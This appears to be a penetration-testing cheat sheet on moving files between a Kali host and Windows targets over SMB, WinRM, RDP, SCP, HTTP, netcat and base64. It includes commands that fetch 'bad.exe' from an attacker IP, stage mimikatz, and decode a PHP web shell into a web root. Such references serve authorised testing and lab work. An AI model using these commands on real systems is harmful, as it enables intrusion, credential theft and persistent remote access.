File Transfer Tricks (Windows - Kali Linux)

Whether you are solving a machine/lab, or engaging in a penetration testing assessment there will be times where you are required to transfer a file, it can be from your host to the target's host (windows/linux) or vice versa. Here I share a few tricks on how you can transfer files from Windows Machine to your Kali host.

Using SMB

With impacket we can use the utility impacket-smbserver to start an SMB server and use it to transfer files from windows.

On Kali Host

impacket-smbserver test . -smb2support -username jojomojo -password jojomojo

On Windows

net use m: \\YOUR_KALI_IP\test /user:jojomojo jojomojo copy backup.zip m:\

Replace YOUR_KALI_IP with your Kali Linux host's IP.

Using Evil-WinRM

Evil-WinRM has built-in commands known as upload and download which can be used to upload and download files respectively.

Uploading Files To Windows

upload /path/to/sourcefile C:\path\to\destinationfile upload /home/kali/Desktop/chisel.exe C:\Users\testuser\chisel.exe

Downloading Files From Windows

download C:\path\to\sourcefile /path/to/destinationfile download C:\Users\testuser\Desktop\backup.zip /home/kali/Desktop/backup.zip

Using Impacket Utilities

Some of the impacket utilities such as impacket-psexec, impacket-wmiexec, impacket-smbexec have built-in commands such as lput and lget that can be used to upload and download a file.

Uploading A File To Windows

A file that is uploaded with this command, will be uploaded to the *C:\Windows* directory.

C:\Windows\system32> lput mimikatz.exe [*] Uploading mimikatz.exe to ADMIN$\/ C:\Windows\system32> cd C:\windows C:\Windows> dir /b mimikatz.exe mimikatz.exe

Downloading A File From Windows

C:\Windows> lget mimikatz.log [*] Downloading ADMIN$\mimikatz.log

Using RDP

If the windows machine has a RDP port open, we can mount shared folders and copy files.

On Kali Host

rdesktop -z -P -x m -u jojomojo -p lab 192.168.1.120 -r disk:test=/path/to/your/shared/dir

On Windows

copy mimikatz.log \\tsclient\test\mimikatz.log

Using SSH (SCP)

SCP can be useful especially when transferring large files.

Uploading A File To Windows

scp /home/kali/Desktop/bad.exe Administrator@192.168.1.102:'C:\Users\Administrator\Documents\good.exe'

Downloading A File From Windows

scp Administrator@192.168.1.102:'C:\Users\Administrator\Documents\important_file.zip' /home/kali/Documents/

Using Base64

Base64 encoding/decoding can be used as a way to transfer files from/to windows.

Transferring File From Kali Linux To Windows

On Kali Host

Contents of webshell.php

└─$ cat webshell.php
<?php echo shell_exec($_GET['cmd']); ?>

Encoding the content of webshell.php, you can use either one of these commands to encode the webshell to base64, then copy the output.

└─$ base64 -w0 <<< cat webshell.php └─$ cat webshell.php | base64 -w0 # output PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==
On Windows (Powershell)
PS C:\Users\jojomojo\Documents> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==')) > C:\inetpub\wwwroot\shell.php
On Windows (certutil.exe)
C:\Users\jojomojo\Documents> echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg== > enc C:\Users\jojomojo\Documents> certutil -decode .\enc C:\inetpub\wwwroot\shell.php

Using HTTP

On Kali Host

Run any of the commands below to start a HTTP webserver

python3 -m http.server 80 python2 -m SimpleHTTPServer 80

On Windows

With certutil.exe
certutil.exe -urlcache -f http://192.168.1.120/test.exe bad.exe
With curl.exe
curl -s -O http://192.168.1.102/test.exe
With wget.exe
wget -o bad.exe http://192.168.1.102/test.exe
With iwr Powershell
Invoke-WebRequest -Uri "https://192.168.1.102/test.exe" -OutFile "C:\Downloads\bad.exe" iwr http://192.168.1.102/test.exe -OutFile "C:\Downloads\bad.exe"

Using Netcat (nc)

On kali host

nc 10.1.1.17 443 < /home/kali/Desktop/bad.exe

On Windows

C:\Users\jojomojo\Test> nc.exe -l -p 443 > C:\Users\jojomojo\Documents\serviceRun.exe

Although there are more methods/techniques used to transfer files, the few mentioned above are most used methods in common pentesting scenarios allowing you to easily transfer files from windows to your kali linux host.